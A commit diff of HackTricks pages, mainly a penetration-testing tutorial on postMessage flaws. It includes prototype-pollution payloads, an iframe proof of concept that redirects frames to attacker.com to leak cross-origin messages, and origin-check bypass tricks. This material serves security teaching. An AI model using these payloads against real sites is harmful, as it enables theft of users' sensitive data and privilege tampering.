GitBook: [master] 2 pages modified
This commit is contained in:
parent
8625431ec6
commit
eb47c749d2
|
@ -50,7 +50,6 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their
|
|||
|
||||
|
||||
|
||||
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
|
||||
|
||||
**Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.**
|
||||
**Copyright © Carlos Polop 2020. Except where otherwise specified \(the copied information belongs to the original authors\), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International \(CC BY-NC 4.0\)**](https://creativecommons.org/licenses/by-nc/4.0/)**.
|
||||
If you want to use it with commercial purposes, please contact with me.**
|
||||
|
||||
|
|
|
@ -1,40 +1,51 @@
|
|||
# PostMessage Vulnerabilities
|
||||
|
||||
## **PostMessages wildcards**
|
||||
## Send **PostMessage**
|
||||
|
||||
**PostMessage** uses the following function to send a message:
|
||||
|
||||
```javascript
|
||||
```bash
|
||||
targetWindow.postMessage(message, targetOrigin, [transfer]);
|
||||
|
||||
# postMessage to current page
|
||||
window.postMessage('{"__proto__":{"isAdmin":True}}', '*')
|
||||
|
||||
# postMessage to an iframe with id "idframe"
|
||||
document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*')
|
||||
|
||||
# postMessage to an URL
|
||||
window.postMessage('{"__proto__":{"isAdmin":True}}', 'https://company.com')
|
||||
```
|
||||
|
||||
Check that **targetOrigin** could be a url like _https://company.com_, so the messages can only be sent to that user \(secure\). Or it cloud be a wildcard "**\***". In case a wildcard is used, messages could be sent to any domain.
|
||||
Note that **targetOrigin** can be a '\*' or an URL like _https://company.com._
|
||||
In the **second scenario**, the **message can only be sent to that domain** \(even if the origin of the window object is different\).
|
||||
If the **wildcard** is used, **messages could be sent to any domain**, and will be sent to the origin of the Window object.
|
||||
|
||||
### Attack
|
||||
### Attacking iframe & wilcard in **targetOrigin**
|
||||
|
||||
In [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) you can read how you could **iframe a page** that at some point may **sent** a **postmessage** using a **wildcard as targetOrigin** and **modify it's location so the data will be sent to an arbitrary domain**. In order to be able to perform this attack **X-Frame header must not be present** in the vuln page.
|
||||
As explained in [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) if you find a page that can be **iframed** \(no `X-Frame-Header` protection\) and that is **sending sensitive** message via **postMessage** using a **wildcard** \(\*\), you can **modify** the **origin** of the **iframe** and **leak** the **sensitive** message to a domain controlled by you.
|
||||
Note that if the page can be iframed but the **targetOrigin** is **set to a URL and not to a wildcard**, this **trick won't work**.
|
||||
|
||||
```markup
|
||||
<html>
|
||||
<iframe src="https://docs.google.com/document/ID" />
|
||||
<script>
|
||||
//pseudo code
|
||||
|
||||
|
||||
setTimeout(function(){ exp(); }, 6000);
|
||||
|
||||
function exp(){
|
||||
setInterval(function(){
|
||||
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
|
||||
}, 100);
|
||||
}
|
||||
</script>
|
||||
<iframe src="https://docs.google.com/document/ID" />
|
||||
<script>
|
||||
setTimeout(exp, 6000); //Wait 6s
|
||||
|
||||
//Try to change the origin of the iframe each 100ms
|
||||
function exp(){
|
||||
setInterval(function(){
|
||||
window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
|
||||
}, 100);
|
||||
}
|
||||
</script>
|
||||
</html>
|
||||
```
|
||||
|
||||
## addEventListener exploitation
|
||||
|
||||
In order to treat the messages a code similar to the following one will be used:
|
||||
**`addEventListener`** is the function used by JS to declare the function that is **expecting `postMessages`**.
|
||||
A code similar to the following one will be used:
|
||||
|
||||
```javascript
|
||||
window.addEventListener("message", (event) => {
|
||||
|
@ -45,24 +56,15 @@ window.addEventListener("message", (event) => {
|
|||
}, false);
|
||||
```
|
||||
|
||||
Note in this case how the first thing that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information \(like changing a password\). If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints and change the victims passwords \(in this example\).
|
||||
Note in this case how the **first thing** that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information \(like changing a password\). **If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints** and change the victims passwords \(in this example\).
|
||||
|
||||
It's important to check the origin and it's **equally important to check it right:**
|
||||
|
||||
### Tips/Bypasses in PostMessage vulnerabilities
|
||||
### addEventListener check origin bypasses
|
||||
|
||||
Copied from [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)
|
||||
|
||||
* If `indexOf()` is used to check the origin of the PostMessage event, remember that it can be bypassed if the origin is contained in the string as seen in [_The Bypass_](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html#bypass)
|
||||
* [@filedescriptor](https://twitter.com/filedescriptor): Using `search()` to validate the origin could be insecure. According to the docs of `String.prototype.search()`, the method takes a regular repression object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp.
|
||||
|
||||
```javascript
|
||||
"https://www.safedomain.com".search(t.origin)
|
||||
```
|
||||
|
||||
In regular expression, a dot \(.\) is treated as a wildcard. In other words, any character of the origin can be replaced with a dot. An attacker can take advantage of it and use a special domain instead of the official one to bypass the validation, such as **www.s.afedomain.com**.
|
||||
|
||||
* [@bored-engineer](https://bored.engineer/): If `escapeHtml` function is used, the function does not create a `new` escaped object, instead it over-writes properties of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
|
||||
* If **`indexOf()`** is used to **check** the **origin** of the PostMessage event, remember that it can be easily bypassed like in the following example: `("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")`
|
||||
* If **`search()`** is used to **validate** the **origin** could be insecure. According to the docs of `String.prototype.search()`, the method **takes a regular repression** object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp. In regular expression, **a dot \(.\) is treated as a wildcard**. An attacker can take advantage of it and **use** a **special domain** instead of the official one to bypass the validation, like in: `"https://www.safedomain.com".search("www.s.fedomain.com")`.
|
||||
* If **`escapeHtml`** function is used, the function does not create a `new` escaped object, instead it over-writes properties of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
|
||||
|
||||
```javascript
|
||||
// Expected to fail:
|
||||
|
|
Loading…
Reference in New Issue